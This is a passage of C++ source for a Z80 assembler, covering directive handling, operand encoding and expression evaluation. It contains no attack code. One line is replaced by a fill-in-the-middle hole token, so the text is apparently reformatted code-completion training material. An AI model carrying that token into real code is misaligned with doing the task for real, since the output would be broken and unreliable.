THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
code = tok.code();
if(!determine_command_simple(tok.subtype())) {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() == CODE_COUNT) {
val = evaluate_expression(statement, node.children().at(CODE_OFFSET), origin,
token_factory, node_factory);
info = determine_command_information(tok.subtype(), tok.mode());
if(determine_command_relative(tok.subtype())) {
if(val > origin) {
val = (val - origin - tok.length()) % UINT8_MAX;
} else {
val = UINT8_MAX - ((origin - val) % UINT8_MAX)
- (info.first.second - info.second.size());
}
}
off = info.second.front();
if(info.second.size() == CODE_EXTENDED) {
((uint8_t *) &code)[off] = (val & UINT8_MAX);
((uint8_t *) &code)[++off] = ((val >> BITS_PER_BYTE) & UINT8_MAX);
} else {
((uint8_t *) &code)[off] = (val & UINT8_MAX);
}
}
}
for(iter = 0; iter < tok.length(); ++iter) {
m_binary.push_back((code >> (iter * BITS_PER_BYTE)) & UINT8_MAX);
}
origin += tok.length();
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit);
}
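// assembler-pass directive handling: definitions, data emission
// (db/dw/ds), conditionals, binary includes, origin and undefine;
// source includes were already expanded by the preprocessor pass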
void
_z80_assembler::evaluate_directive(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__in const std::string &base_path,
__inout bool &exit_condition
)
{
uint8_t val;
z80_token tok;
std::string text;
size_t len, count = 0;
z80_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_DIRECTIVE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_DIRECTIVE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
switch(tok.subtype()) {
case DIRECTIVE_DEFINE:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
text = tok.text();
iter = m_identifier_map.find(text);
if(iter != m_identifier_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_DUPLICATE_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_identifier_map.insert(std::pair<std::string, uint16_t>(text,
evaluate_expression(statement, ++offset, origin,
token_factory, node_factory)));
break;
case DIRECTIVE_DEFINE_BYTE:
case DIRECTIVE_DEFINE_WORD:
evaluate_expression_list(statement, ++offset, origin, token_factory,
node_factory, exit_condition, tok.subtype() == DIRECTIVE_DEFINE_WORD);
break;
case DIRECTIVE_DEFINE_SPACE: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() != DEFS_EXPRESSION_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
val = evaluate_expression(statement, node.children().at(DEFS_EXPRESSION_VALUE_OFFSET),
origin, token_factory, node_factory);
len = evaluate_expression(statement, node.children().at(DEFS_EXPRESSION_OFFSET),
origin, token_factory, node_factory);
for(; count < len; ++count) {
m_binary.push_back(val);
}
origin += len;
} break;
case DIRECTIVE_END_SEGMENT:
exit_condition = true;
break;
case DIRECTIVE_IF_CONDITIONAL: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if((node.children().size() < IF_CONDITIONAL_COUNT_MIN)
|| (node.children().size() > IF_CONDITIONAL_COUNT_MAX)) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
if(evaluate_expression_conditional(statement,
node.children().at(IF_CONDITIONAL_ID_OFF),
origin, token_factory, node_factory)) {
evaluate_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_MAIN_OFF),
origin, token_factory, node_factory,
exit_condition);
} else if(node.children().size() == IF_CONDITIONAL_COUNT_MAX) {
evaluate_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_AUX_OFF),
origin, token_factory, node_factory,
exit_condition);
}
} break;
case DIRECTIVE_IF_DEFINED: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if((node.children().size() < IF_CONDITIONAL_COUNT_MIN)
|| (node.children().size() > IF_CONDITIONAL_COUNT_MAX)) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, node.children().at(IF_CONDITIONAL_ID_OFF),
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
if(m_identifier_map.find(tok.text()) != m_identifier_map.end()) {
evaluate_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_MAIN_OFF),
origin, token_factory, node_factory,
exit_condition);
} else if(node.children().size() == IF_CONDITIONAL_COUNT_MAX) {
evaluate_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_AUX_OFF),
origin, token_factory, node_factory,
exit_condition);
}
} break;
case DIRECTIVE_INCLUDE:
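			// source inclusion is expanded during the preprocessor pass,
			// so there is nothing left to emit here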
break;
case DIRECTIVE_INCLUDE_BINARY: {
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_LITERAL_STRING) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_LITERAL_STRING,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
std::ifstream file(z80_lexer_base::base_path() + tok.text(),
std::ios::in | std::ios::binary);
if(!file) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_FILE_NOT_FOUND,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
file.seekg(0, std::ios::end);
len = file.tellg();
file.seekg(0, std::ios::beg);
for(; count < len; ++count) {
if(file.eof()) {
break;
}
m_binary.push_back(file.get());
}
file.close();
origin += len;
} break;
case DIRECTIVE_ORIGIN:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IMMEDIATE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IMMEDIATE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
origin = tok.value();
break;
case DIRECTIVE_UNDEFINE:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
iter = m_identifier_map.find(tok.text());
if(iter == m_identifier_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_UNDEFINED_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_identifier_map.erase(iter);
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_DIRECTIVE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit);
}
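// recursively evaluate an expression subtree (nested expressions,
// macros, unary operators, terminals), then fold any trailing binary
// operator nodes into the running result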
uint16_t
_z80_assembler::evaluate_expression(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
z80_token tok;
uint16_t result = 0;
size_t expr_off = offset;
bool expr_header = false;
z80_node_child_lst_t::iterator child_iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(tok.type() == TOKEN_EXPRESSION) {
expr_header = true;
if(node.children().size() < EXPRESSION_COUNT_MIN) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
expr_off = node.children().at(EXPRESSION_LEFT_OFF);
tok = z80_parser::acquire_token(statement, expr_off, token_factory,
node_factory);
}
switch(tok.type()) {
case TOKEN_EXPRESSION:
result = evaluate_expression(statement, expr_off, origin, token_factory,
node_factory);
break;
case TOKEN_MACRO: {
z80_node node = z80_parser::acquire_node(statement, expr_off, node_factory);
if(node.children().size() != MACRO_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
result = evaluate_expression(statement, node.children().at(MACRO_CHILD_OFF),
origin, token_factory, node_factory);
switch(tok.subtype()) {
case MACRO_HIGH:
result = (result >> BITS_PER_BYTE) & UINT8_MAX;
break;
case MACRO_LOW:
result = result & UINT8_MAX;
break;
case MACRO_WORD:
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_MACRO,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
} break;
case TOKEN_SYMBOL: {
z80_node node = z80_parser::acquire_node(statement, expr_off, node_factory);
if(node.children().size() != UNARY_OPERATOR_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
result = evaluate_expression(statement, node.children().at(UNARY_OPERATOR_CHILD_OFF),
origin, token_factory, node_factory);
switch(tok.subtype()) {
case SYMBOL_ARITHMETIC_SUBTRACTION:
result *= -1;
break;
case SYMBOL_UNARY_NOT:
result = !result;
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_UNARY_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
} break;
default:
result = evaluate_expression_terminal(statement, expr_off, origin, token_factory,
node_factory);
break;
}
if(expr_header &&
(node.children().size() > EXPRESSION_COUNT_MIN)) {
for(child_iter = node.children().begin() + EXPRESSION_RIGHT_OFF;
child_iter != node.children().end(); ++child_iter) {
result = evaluate_expression_operator(statement, *child_iter, origin,
token_factory, node_factory, result);
}
}
TRACE_EXIT("Return Value: 0x%04x (off: %lu, org: 0x%04x)", result, offset, origin);
return result;
}
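// evaluate a conditional expression of the form
// <expression> <comparison-operator> <expression>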
bool
_z80_assembler::evaluate_expression_conditional(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
z80_token tok;
bool result = false;
uint16_t left, right;
<|fim▁hole|> SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_EXPRESSION_CONDITIONAL) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_EXPRESSION_CONDITIONAL,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() != COND_EXPRESSION_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
left = evaluate_expression(statement, node.children().at(COND_EXPRESSION_OPERAND_LEFT),
origin, token_factory, node_factory);
right = evaluate_expression(statement, node.children().at(COND_EXPRESSION_OPERAND_RIGHT),
origin, token_factory, node_factory);
tok = z80_parser::acquire_token(statement, node.children().at(COND_EXPRESSION_OPERATOR),
token_factory, node_factory);
if(tok.type() != TOKEN_SYMBOL) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
switch(tok.subtype()) {
case SYMBOL_EQUALS:
result = (left == right);
break;
case SYMBOL_GREATER_THAN:
result = (left > right);
break;
case SYMBOL_GREATER_THAN_EQUALS:
result = (left >= right);
break;
case SYMBOL_LESS_THAN:
result = (left < right);
break;
case SYMBOL_LESS_THAN_EQUALS:
result = (left <= right);
break;
case SYMBOL_NOT_EQUALS:
result = (left != right);
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
TRACE_EXIT("Return Value: 0x%x (off: %lu, org: 0x%04x)", result, offset, origin);
return result;
}
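// emit each entry of an expression list as a byte (or word, when wide
// is set); string literals are emitted character by character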
void
_z80_assembler::evaluate_expression_list(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition,
__in_opt bool wide
)
{
uint16_t val;
z80_token tok;
std::string::iterator str_iter;
z80_node_child_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_EXPRESSION_LIST) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_EXPRESSION_LIST,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
for(iter = node.children().begin(); iter != node.children().end(); ++iter) {
tok = z80_parser::acquire_token(statement, *iter, token_factory,
node_factory);
switch(tok.type()) {
			case TOKEN_LITERAL_STRING: {

					// take a copy of the literal so both loop iterators
					// refer to the same string object
					std::string text = tok.text();

					for(str_iter = text.begin(); str_iter != text.end();
							++str_iter) {

						if(wide) {
							m_binary.push_back(0);
							origin += sizeof(uint8_t);
						}

						m_binary.push_back(*str_iter);
						origin += sizeof(uint8_t);
					}
				} break;
default:
val = evaluate_expression(statement, *iter, origin,
token_factory, node_factory);
if(wide) {
m_binary.push_back((val >> BITS_PER_BYTE) & UINT8_MAX);
origin += sizeof(uint8_t);
}
m_binary.push_back(val & UINT8_MAX);
origin += sizeof(uint8_t);
break;
}
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
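// apply a binary operator node to the running expression value,
// recursing through any chained operator children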
uint16_t
_z80_assembler::evaluate_expression_operator(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__in uint16_t current
)
{
z80_token tok;
uint16_t result = 0, right_result;
z80_node_child_lst_t::iterator child_iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_SYMBOL) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() < OPERATOR_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
right_result = evaluate_expression(statement, node.children().at(OPERATOR_CHILD_OFF),
origin, token_factory, node_factory);
if(node.children().size() > OPERATOR_COUNT) {
for(child_iter = node.children().begin() + OPERATOR_COUNT;
child_iter != node.children().end();
++child_iter) {
result += evaluate_expression_operator(statement, *child_iter,
origin, token_factory, node_factory,
right_result);
}
} else {
switch(tok.subtype()) {
case SYMBOL_ARITHMETIC_ADDITION:
result = current + right_result;
break;
case SYMBOL_ARITHMETIC_DIVISION:
result = current / right_result;
break;
case SYMBOL_ARITHMETIC_MODULUS:
result = current % right_result;
break;
case SYMBOL_ARITHMETIC_MULTIPLICATION:
result = current * right_result;
break;
case SYMBOL_ARITHMETIC_SUBTRACTION:
result = current - right_result;
break;
case SYMBOL_BINARY_AND:
result = current & right_result;
break;
case SYMBOL_BINARY_OR:
result = current | right_result;
break;
case SYMBOL_BINARY_XOR:
result = current ^ right_result;
break;
case SYMBOL_SHIFT_LEFT:
result = current << right_result;
break;
case SYMBOL_SHIFT_RIGHT:
result = current >> right_result;
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
}
TRACE_EXIT("Return Value: 0x%04x (off: %lu, org: 0x%04x, curr: %lu)", result,
offset, origin, current);
return result;
}
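// resolve a terminal value: constants, identifiers/labels looked up
// in the symbol tables, immediates and character literals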
uint16_t
_z80_assembler::evaluate_expression_terminal(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
z80_token tok;
uint16_t result = 0;
z80_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_CONSTANT:
result = tok.subtype();
break;
case TOKEN_IDENTIFIER:
iter = m_identifier_map.find(tok.text());
if(iter == m_identifier_map.end()) {
iter = m_label_map.find(tok.text());
if(iter == m_label_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_UNDEFINED_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
}
result = iter->second;
break;
case TOKEN_IMMEDIATE:
case TOKEN_LITERAL_CHARACTER:
result = tok.value();
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_EXPRESSION_TERMINAL,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
TRACE_EXIT("Return Value: 0x%04x (off: %lu, org: 0x%04x)", result, offset, origin);
return result;
}
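// preprocessor pass only advances the origin by the command length;
// no bytes are emitted here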
void
_z80_assembler::evaluate_preprocessor_command(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_CODE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_COMMAND,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
origin += tok.length();
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
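// preprocessor-pass directive handling: expands source includes into
// the statement stream and tracks the origin so that label addresses
// are known before the assembler pass runs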
void
_z80_assembler::evaluate_preprocessor_directive(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__in const std::string &base_path,
__inout bool &exit_condition
)
{
z80_token tok;
size_t len, pos;
std::string text;
z80_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_DIRECTIVE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_DIRECTIVE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
switch(tok.subtype()) {
case DIRECTIVE_DEFINE:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
text = tok.text();
iter = m_identifier_map.find(text);
if(iter != m_identifier_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_DUPLICATE_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_identifier_map.insert(std::pair<std::string, uint16_t>(text,
evaluate_expression(statement, ++offset, origin,
token_factory, node_factory)));
break;
case DIRECTIVE_DEFINE_BYTE:
case DIRECTIVE_DEFINE_WORD:
evaluate_preprocessor_expression_list(statement, ++offset, origin, token_factory,
node_factory, exit_condition, tok.subtype() == DIRECTIVE_DEFINE_WORD);
break;
case DIRECTIVE_DEFINE_SPACE: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() != DEFS_EXPRESSION_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
origin += evaluate_expression(statement, node.children().at(DEFS_EXPRESSION_OFFSET),
origin, token_factory, node_factory);
} break;
case DIRECTIVE_END_SEGMENT:
exit_condition = true;
break;
case DIRECTIVE_IF_CONDITIONAL: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if((node.children().size() < IF_CONDITIONAL_COUNT_MIN)
|| (node.children().size() > IF_CONDITIONAL_COUNT_MAX)) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
if(evaluate_expression_conditional(statement,
node.children().at(IF_CONDITIONAL_ID_OFF),
origin, token_factory, node_factory)) {
evaluate_preprocessor_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_MAIN_OFF),
origin, token_factory, node_factory,
exit_condition);
} else if(node.children().size() == IF_CONDITIONAL_COUNT_MAX) {
evaluate_preprocessor_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_AUX_OFF),
origin, token_factory, node_factory,
exit_condition);
}
} break;
case DIRECTIVE_IF_DEFINED: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if((node.children().size() < IF_CONDITIONAL_COUNT_MIN)
|| (node.children().size() > IF_CONDITIONAL_COUNT_MAX)) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, node.children().at(IF_CONDITIONAL_ID_OFF),
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
if(m_identifier_map.find(tok.text()) != m_identifier_map.end()) {
evaluate_preprocessor_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_MAIN_OFF),
origin, token_factory, node_factory,
exit_condition);
} else if(node.children().size() == IF_CONDITIONAL_COUNT_MAX) {
evaluate_preprocessor_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_AUX_OFF),
origin, token_factory, node_factory,
exit_condition);
}
} break;
case DIRECTIVE_INCLUDE: {
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_LITERAL_STRING) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_LITERAL_STRING,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_parser par(z80_lexer_base::base_path() + tok.text(), true);
par.discover();
if(par.size()) {
pos = position();
if(par.statement() == par.statement_begin()) {
par.move_next_statement();
}
while(par.has_next_statement()) {
insert_statement(par.statement(), ++pos);
par.move_next_statement();
}
}
} break;
case DIRECTIVE_INCLUDE_BINARY: {
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_LITERAL_STRING) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_LITERAL_STRING,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
std::ifstream file(z80_lexer_base::base_path() + tok.text(),
std::ios::in | std::ios::binary);
if(!file) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_FILE_NOT_FOUND,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
file.seekg(0, std::ios::end);
len = file.tellg();
file.close();
origin += len;
} break;
case DIRECTIVE_ORIGIN:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IMMEDIATE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IMMEDIATE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
origin = tok.value();
break;
case DIRECTIVE_UNDEFINE:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
iter = m_identifier_map.find(tok.text());
if(iter == m_identifier_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_UNDEFINED_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_identifier_map.erase(iter);
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_DIRECTIVE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
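// size-only pass over an expression list: advances the origin without
// emitting any bytes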
void
_z80_assembler::evaluate_preprocessor_expression_list(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition,
__in_opt bool wide
)
{
z80_token tok;
z80_node_child_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_EXPRESSION_LIST) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_EXPRESSION_LIST,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
for(iter = node.children().begin(); iter != node.children().end(); ++iter) {
tok = z80_parser::acquire_token(statement, *iter, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_LITERAL_STRING:
origin += (wide ? (sizeof(uint16_t) * tok.text().size()) : tok.text().size());
break;
default:
origin += (wide ? sizeof(uint16_t) : sizeof(uint8_t));
break;
}
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
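// record the address (current origin) of a label, rejecting duplicates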
void
